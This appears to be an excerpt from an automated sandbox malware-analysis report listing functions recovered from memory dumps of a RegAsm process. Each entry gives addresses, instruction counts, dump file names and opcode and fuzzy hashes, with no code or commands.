Instruction Fuzzy Hash: 3D21D475A0130A9FD711DF9DD8409ABBBF6EFC9320B11856ED4598B221CB30EC05CBA1

Function 06B248B8 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbfd671eeaf7ca181a25ded098b0d4530be821666e178b3342c44973641f6dab
Instruction ID: c6f2d6b3939f49a0038901e73d00e10dfe714cf2294b0f59719118e6c515d432
Opcode Fuzzy Hash: fbfd671eeaf7ca181a25ded098b0d4530be821666e178b3342c44973641f6dab
Instruction Fuzzy Hash: C7328E74B006168FDB54DF39C888A6ABBF6FF89700B1594A9E50ACB761DB30EC05CB50

Function 06DCC588 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee45401fb8e2508979decea66f59a4515b981bf874bdb2a4a9e59979ac4c2d22
Instruction ID: 76b772f2da901a4e41216fad10bb4768a8bb1a05a5b5d8456f7338574eb21e24
Opcode Fuzzy Hash: ee45401fb8e2508979decea66f59a4515b981bf874bdb2a4a9e59979ac4c2d22
Instruction Fuzzy Hash: 0502AD30A0070A8FDB65DF28C454B9ABBB2EF89314F158298D54DAB291DB35ED85CF80

Function 06DCB920 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5bbadb81850410ba6ecd23d349e1d1abe848553ebff140336ca5db5c25937e
Instruction ID: 62751c1ed09181a4ccecb6544c67f874bd770a09cffa8392ebd1736a55d8c0b0
Opcode Fuzzy Hash: 2b5bbadb81850410ba6ecd23d349e1d1abe848553ebff140336ca5db5c25937e
Instruction Fuzzy Hash: 62023A35A0071ADFDB14DF68C954A99B7B1FF89310F118699E849AB361EB34ED81CF80

Function 06DC78B0 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20ae4772a736b041e946a8628e92db50f8d5ab4c5f5e3031364c1941d00e8e4c
Instruction ID: 6988c6ed52c732492b70ea29b4212077c1ecb0a13b5e28b66102a4b674a22882
Opcode Fuzzy Hash: 20ae4772a736b041e946a8628e92db50f8d5ab4c5f5e3031364c1941d00e8e4c
Instruction Fuzzy Hash: F2D1AC74F0030A9BDB54DBB9D854AAEBBF2EF89210F148069E805EB381DF74DC458B91

Function 06DC7EF0 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0323005bf24b7469a0fe0cbfd1bbeb1c595360052d61669ae110fe8910b260
Instruction ID: e7e53b17e67a6e6fbcb0c6cdd79481a3dfc98e3364d957597c902304914013e6
Opcode Fuzzy Hash: 7c0323005bf24b7469a0fe0cbfd1bbeb1c595360052d61669ae110fe8910b260
Instruction Fuzzy Hash: E6C15E35B0020A9FDB14DF69D8449AEBBF6FF88250B158568E806DB355EB74EC02CB90

Function 06DCC579 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5694c6ee3e566b070a5adedb3a121779b3f5ad3220b89503f5d14b61326e7f90
Instruction ID: 13d5c38b5b2353bba815bdbae4c9c730e5923368977f886e9275179a2e0cf05a
Opcode Fuzzy Hash: 5694c6ee3e566b070a5adedb3a121779b3f5ad3220b89503f5d14b61326e7f90
Instruction Fuzzy Hash: E3E17770A1070ACFDB61DF28C444B99BBB1FF89314F258699D98DAB251DB30E985CF90

Function 06DCCB50 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e642d8349de82bd46a3c547191a1de87d37d3b3846c9712d11434332d0493873
Instruction ID: a2b87fe3037e7986e9de9d90c25f43c9bd5972cbc2d35cff332e46c55c9f80c3
Opcode Fuzzy Hash: e642d8349de82bd46a3c547191a1de87d37d3b3846c9712d11434332d0493873
Instruction Fuzzy Hash: E6A1EF74B013049FDB599B78D468B6E7BE7AFC9210F6480ADE906DB392DE34CC418B51

Function 06B248A8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2e2b5f3eaf8c4575a2d641abca5fb557bb3c867edba61d8e8438423fb612b34
Instruction ID: b12bd931bba325321f1aef0223e43ed176543935d3750715673a79fc6ffce201
Opcode Fuzzy Hash: b2e2b5f3eaf8c4575a2d641abca5fb557bb3c867edba61d8e8438423fb612b34
Instruction Fuzzy Hash: 4BB17A74B006058FCB55DF39D888AAABBF6FF89704B1550A8E44ADB762DB30EC05CB50

Function 06DCB911 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d44bc0c97288d087e50d039243d5eb66424d764fb983fcfa72196e59dd6784
Instruction ID: eff7e70b12447ad31959c79580e7cd09aba53723679f7d9bde193c9e65267f0c
Opcode Fuzzy Hash: b0d44bc0c97288d087e50d039243d5eb66424d764fb983fcfa72196e59dd6784
Instruction Fuzzy Hash: 1EC12E3191071ADFDB11DF78C854A99B7B1FF49314F11869AE8896B261EB30E9C5CF80

Function 06DC5DE0 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f61f2cc376dd4432f80ef47a305b35c2d70f1c869e3b64f2e675df7f8b72fe4c
Instruction ID: 34e50c3ba94077c0b072d2204f7d608b7c0bb66135e301673fada8a7837f7654
Opcode Fuzzy Hash: f61f2cc376dd4432f80ef47a305b35c2d70f1c869e3b64f2e675df7f8b72fe4c
Instruction Fuzzy Hash: 82A1F475A00209DFCB44DF68E488E9ABBF6EF89320F154599E905DB362DB34EC85CB50

Function 06DC4EF0 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668cdf088518637cd87920d657702158ddd584d3365a67a4f9491bddc6e007f1
Instruction ID: c8cb77304a55af1ac69702f55626d151f4f71dece34955e92be4ca6f416f1b6f
Opcode Fuzzy Hash: 668cdf088518637cd87920d657702158ddd584d3365a67a4f9491bddc6e007f1
Instruction Fuzzy Hash: 3E81D071B002099FCB05EFB8D854AAF7BB6EF89210F108569E909DB341DB30D955CBA1

Function 06DCFB40 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1de33c31c4a3f44a823ea57e5b30a4062487fdb043a09ed638a3a9cbbf9ee0
Instruction ID: 11df7a1701466be4070b7277b91b003cd8425aa125301661e0b6e9057f43f6ba
Opcode Fuzzy Hash: ef1de33c31c4a3f44a823ea57e5b30a4062487fdb043a09ed638a3a9cbbf9ee0
Instruction Fuzzy Hash: D0819F747002158FDB599F68D494BAE7BF7EFC9610B2580A9E905CB3A1DB34CC41CBA1

Function 06DC6268 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91598e49a8cfc4924646bdca945b6a6ed26a39a2654e548587d8ec151b2da660
Instruction ID: 96a8f87a22e963b03f88578d71382417c8730f07442b9bd13befbec51762b9c5
Opcode Fuzzy Hash: 91598e49a8cfc4924646bdca945b6a6ed26a39a2654e548587d8ec151b2da660
Instruction Fuzzy Hash: 97710270B053499FD7159BB8D86876EBBB2EF8A200F2480EDD845CB392DA35CD45CB91

Function 06DC34F8 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cbc488c6f7cce4d174d122d97d85274dbe4c5cdd7a89bd040a6a21a379ff220
Instruction ID: 8b0eee38d048de545b3d44996f703ddef08455274544edf16162e51e2f4fee32
Opcode Fuzzy Hash: 6cbc488c6f7cce4d174d122d97d85274dbe4c5cdd7a89bd040a6a21a379ff220
Instruction Fuzzy Hash: 83513274B013069FDB59EBA9985427FB7A2EFC9310B60C168C946CB381CF30DC468BA1

Function 06DC3A08 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8669ae4793e6f55aa9e1ad46f0dc593e268ee21eb057aaa78d6e71185a2bc629
Instruction ID: fdd27cfd92ecebce1cef204b77c7be40eb8fe22fafd7e47cdaaf0e72811bec01
Opcode Fuzzy Hash: 8669ae4793e6f55aa9e1ad46f0dc593e268ee21eb057aaa78d6e71185a2bc629
Instruction Fuzzy Hash: 4F513274B013069FDB59ABA9985067EB7A6EFC9310B60C16CD945CB381CF30DC868B91

Function 06DC00A8 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec6c43251ba2ac34ba94571be85962877627c0067ed90c66dabe5924a22de93
Instruction ID: 3935e03b59466633df7894667b7609a8c73bc4950f34040dd52f6073b2c6cdc9
Opcode Fuzzy Hash: 2ec6c43251ba2ac34ba94571be85962877627c0067ed90c66dabe5924a22de93
Instruction Fuzzy Hash: FD5111707003059FDB14DF68D894A6ABBFAEFC9220B1485ADE805CB351DB32EC45CBA0

Function 06DC2980 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f16f938a6ee074a7cee8cb6b085f6ac8a35e0e2f501281cb648378d8a959c13
Instruction ID: 76e052d0b4e14c821adb9a5ee91e3bd022f168cad4b75b3107dd2937b3fcddf8
Opcode Fuzzy Hash: 0f16f938a6ee074a7cee8cb6b085f6ac8a35e0e2f501281cb648378d8a959c13
Instruction Fuzzy Hash: 2151B374B103099BCB49AB79942826FBBA3FFCA340B24852DD506DB381DF788D468B51

Function 06DCDEE0 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5ebeb5d645b0eefb22586f00804466fd555629c2406a49346c0cfb6a0523ed
Instruction ID: 76e1627b395cb2cb9fba6a0b0ae7f114c807686c8395d0d28e77d7d60ccff5e2
Opcode Fuzzy Hash: 0f5ebeb5d645b0eefb22586f00804466fd555629c2406a49346c0cfb6a0523ed
Instruction Fuzzy Hash: E0510870A0538A8FD765DB7AD84476ABFB2BFC1220F0981AED444CB252DB34D885CBD1

Function 06DC5DCF Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af9c0e5dbe130e9e42c89f16f95d9090971faa015a1fcbd72d455f0856629da
Instruction ID: df11c9d92651f7594ab4abc15fc2817cdb36619ba7ae8c7f3b6d12f04f200054
Opcode Fuzzy Hash: 2af9c0e5dbe130e9e42c89f16f95d9090971faa015a1fcbd72d455f0856629da
Instruction Fuzzy Hash: 96511535A00209EFCB54CF59E884A9EBBF6FF88320F158599E445DB361DB30E895CB90

Function 06DC0300 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce60d462310c152e23dacc3f146a008ac7700bf0322693a9d70b9b4b6a65147
Instruction ID: c4f78e76873a534d25c3ca630da4c90504a4dba11f1a262d3230412ce7b18969
Opcode Fuzzy Hash: 7ce60d462310c152e23dacc3f146a008ac7700bf0322693a9d70b9b4b6a65147
Instruction Fuzzy Hash: D0518534A00209DFDB05DF64D854AADBBB6FF89310F158169E405EB3A1DF349D46CB91

Function 06DC2D30 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac068027a6a3eb2e9dacd1d56ac50e746e358535add80a03e0c2e9dd5f5486c1
Instruction ID: 1d1df8ccdd75dbb3471d72ddfd816c33d30dc8f8ae91eb67e84f15eb9aa17b52
Opcode Fuzzy Hash: ac068027a6a3eb2e9dacd1d56ac50e746e358535add80a03e0c2e9dd5f5486c1
Instruction Fuzzy Hash: 7A518E74A002098FCB58DF78D49466EB7F6FF88210B21456DD446EB361CB34ED05CB90

Function 06DC1471 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a1f5c19c2e0667b1469765ac39d4ad3ded97aef5b1889044450f7d62f474b9
Instruction ID: 7e3ea4c10474db2700c551dc96be947675232891f9a32eb94752f3446b38d984
Opcode Fuzzy Hash: d6a1f5c19c2e0667b1469765ac39d4ad3ded97aef5b1889044450f7d62f474b9
Instruction Fuzzy Hash: DD511335A01219DFCB48DF68D98489DBBF2FF89310B25859AE855EB362CB30EC41CB50

Function 06B28C88 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c51db2e2e839e113adbfb86e6676a470b6a92ea0024326b6df12b233bf4bd79
Instruction ID: 7f3806c1931188863350f3059daed4c69ad76d211b3d40d07266229122649b64
Opcode Fuzzy Hash: 8c51db2e2e839e113adbfb86e6676a470b6a92ea0024326b6df12b233bf4bd79
Instruction Fuzzy Hash: C1412A717052585FEB599F74942476F37ABEFC5241F6080A9E9099B384CE348C1AC7E1

Function 06B27D58 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391c13e5c3990a817fe592c8b45b2106fd07642550242a35120dc26ea86f810f
Instruction ID: e6fc1fbdb06ba19233a3968a0f92fc9e618c49bd3dd85fc938455039b5660ec7
Opcode Fuzzy Hash: 391c13e5c3990a817fe592c8b45b2106fd07642550242a35120dc26ea86f810f
Instruction Fuzzy Hash: 135146B1E10269DFDB54DFA9C884BDEBBF6EF48310F14842AD419AB244DB749842CF94

Function 06DC8738 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98fa3609d0de5c00af7194c0831a28490eeab21770536fffdb49127054935a05
Instruction ID: 7079f4330620ddf72986cf8e4fbb52ae5bbd0ae00ead1ee4cefa711ffe1f5f8b
Opcode Fuzzy Hash: 98fa3609d0de5c00af7194c0831a28490eeab21770536fffdb49127054935a05
Instruction Fuzzy Hash: E551D4316003048FD725DF69E454AAEBBF2FFC8210B158B6ED4458B691DB70AC4A8B92

Function 06B259C8 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8378502e8378d2c36434708802b764c9f136333f8341ee3ef0023665241ffd
Instruction ID: c48b6648a672065128287aa717a12d759a61f4c8a43b47bf90483d006567af3c
Opcode Fuzzy Hash: 7c8378502e8378d2c36434708802b764c9f136333f8341ee3ef0023665241ffd
Instruction Fuzzy Hash: 0C515976B00616CFCB60CF58C8849AABBF2FF89310B55C9A9E5599B361D730F905CB90

Function 06DC1480 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc79584cf8c25fa5cacff83ce75f55a9672f00d49c6aae28ffc9b8ef54ad313f
Instruction ID: b38c5b3966f8a84ad8f5076b7651269e952a314b9f34d853e0ee746deda09e2a
Opcode Fuzzy Hash: fc79584cf8c25fa5cacff83ce75f55a9672f00d49c6aae28ffc9b8ef54ad313f
Instruction Fuzzy Hash: 3651F535A01119DFCB48DF68D98499DBBF2FF88324B258299E815AB371CB30EC41CB90

Function 06DCCF00 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96918d7a46c22630b28ab597754300df887ac5e60cbf522c660a5bd769b2ddce
Instruction ID: 059da41f864a640d64bef4ca3d50a761f501b80180a99530f2dd8e783217fd13
Opcode Fuzzy Hash: 96918d7a46c22630b28ab597754300df887ac5e60cbf522c660a5bd769b2ddce
Instruction Fuzzy Hash: 1E411430B053099FCB019B78D8286AEBBB6FF8A300B1045AEE545D7352DF349941CB91

Function 06B2FE88 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93477ef811ef0911f8d96e4e3cbf82fe0fccf5e1f50cffe3fde6a35ecc097791
Instruction ID: 6aeae3b00debe4d32f32fefbf3adc55d3d15f0ec1c328f469e90f7e64460eae0
Opcode Fuzzy Hash: 93477ef811ef0911f8d96e4e3cbf82fe0fccf5e1f50cffe3fde6a35ecc097791
Instruction Fuzzy Hash: 8141777170A3455FCB069B78A8143AB7FB9DF83210F1445EAE808CB292DE35CC86C792

Function 06B27D57 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63fb8352888a09928ffa840f5d860fe83ee19320199ac3971eb63002bfaaf48e
Instruction ID: 26f6ea82eec2b2eb3ef7e13d57a4820c74af7d244ed5b53377a54a9d39c6f798
Opcode Fuzzy Hash: 63fb8352888a09928ffa840f5d860fe83ee19320199ac3971eb63002bfaaf48e
Instruction Fuzzy Hash: F85149B0D1026ADFDB54DFA9C885BDEBBF5AF48300F14842AD419AB244DB749841CF95

Function 06DCADD0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced7352654644aec09681bda3c63037471db7917999635786fe882c9e9b96c25
Instruction ID: 9dd7507a8850b3d22825b276437c089b7cf52bfabe31bb45886c323762373080
Opcode Fuzzy Hash: ced7352654644aec09681bda3c63037471db7917999635786fe882c9e9b96c25
Instruction Fuzzy Hash: D2415C70A0030A8FCB54DF78D8946AEBBB6FF89310F14466DE445EB291EB39D841CB90

Function 06DCADE0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae93a6e247554cd24fb66fff71dd9aacd9a556b01b666534f466e7b42bb8d0af
Instruction ID: a0153852e8f4b3ab266e1fa0a623cbb7950190d1c504f05da55058c598245457
Opcode Fuzzy Hash: ae93a6e247554cd24fb66fff71dd9aacd9a556b01b666534f466e7b42bb8d0af
Instruction Fuzzy Hash: E4412C75B0030A8FCB54EF79D8946AEB7B6FF88310F14466DD4469B250EB39E842CB90

Function 06DCDD40 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b7aff52cecf973f5a58a408d8ecde91a5bb59776935dfb5368ea6402116220
Instruction ID: eba7dd09139f9665940a76d89284cc1484582d1d0b7e382e1fa9a25ae10e3605
Opcode Fuzzy Hash: 44b7aff52cecf973f5a58a408d8ecde91a5bb59776935dfb5368ea6402116220
Instruction Fuzzy Hash: 4541D330A107099FDB04DB75D8546EAF7B9FF8A300F10C62DE555A7251EF70A984CB50

Function 06B23DE0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f48f86392ee437cc0597f763c571668bf57b7decd15e848911fcefbb03f187
Instruction ID: 70fea13bf33144e4a488f0ab00ff2aa647415e6f54bd3ba5637c2db5aeafcfa9
Opcode Fuzzy Hash: 42f48f86392ee437cc0597f763c571668bf57b7decd15e848911fcefbb03f187
Instruction Fuzzy Hash: 2D3147717113504FC75AA778A8601AE77E6DFCA21031598EAE449CF381CE34DC0BC7A2

Function 06DC38B8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57a4ad17ab1664efa09981a814d61e3c8bab79718bbefe902ebf47e5001b791
Instruction ID: 9cb9027ec718ca17bcd010f64b4f4da386fcb59f387ab4de0aac0c1ce3d21984
Opcode Fuzzy Hash: f57a4ad17ab1664efa09981a814d61e3c8bab79718bbefe902ebf47e5001b791
Instruction Fuzzy Hash: DE41BD753105119FC758DF29E988C1ABBFAFF8961432681D9E549CB372CA30EC44CBA0

Function 06B25579 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b149ffe344230af5ce1bd462f0e2dd230cba898d75f27b45320cba17fadbe5c
Instruction ID: 458d2f27fddbe5856f906ee57a98459500112eba43ccb06fb115a4dd50b5d0f4
Opcode Fuzzy Hash: 5b149ffe344230af5ce1bd462f0e2dd230cba898d75f27b45320cba17fadbe5c
Instruction Fuzzy Hash: 44318D75B013119FCB56DF38D8889AEBBB2FF89200B1194A9E905CB395DB31ED05CB90

Function 06B2FDCE Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0593cdd05e6b3791b309d69b25a8e38ac5c150caade31e271e1c850275511c83
Instruction ID: 62ba22784389c51f60595eea46a1341626d585eab0d36e6660f0c0dc28077582
Opcode Fuzzy Hash: 0593cdd05e6b3791b309d69b25a8e38ac5c150caade31e271e1c850275511c83
Instruction Fuzzy Hash: F93144B27093514FCB0A6F74A4282EB7BE6EFC711031445AEE505CB292DE35CC86CB91

